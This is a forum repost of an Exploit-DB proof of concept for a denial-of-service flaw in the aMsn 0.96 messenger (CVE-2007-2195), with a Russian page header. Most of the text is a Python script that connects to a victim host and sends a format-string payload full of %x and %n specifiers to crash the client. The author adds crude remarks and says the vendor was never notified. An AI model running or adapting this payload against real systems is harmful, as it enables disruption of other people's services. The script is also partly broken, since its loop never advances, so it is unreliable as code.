Exploit AMSN 0.96 - Malformed Message Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29875
Проверка EDB
  1. Пройдено
Автор
LEVENT KAYAN
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2007-2195
Дата публикации
2007-04-21
AMSN 0.96 - Malformed Message Denial of Service
Код:
source: https://www.securityfocus.com/bid/23583/info

aMsn is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

This issue affects aMsn 0.96 and prior versions.

import socket

HOST = 'victim.com'
PORT = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
   s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
          ?!"?$%&/()=?`#+#-.,;:_??????%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
          %n%n%n%n%n%n\????#?[{#?]?#\`~??')

---fuck off here---

I think it were the character '}', '{' or '%x', '%n'. Try to determine this for
yourself! Don't bug me with this shit.

/* Vendor contacted? */
NO! Why should I contact them? :) lol, go away and contact them yourself.

/* EOF */
 
Источник
www.exploit-db.com

Похожие темы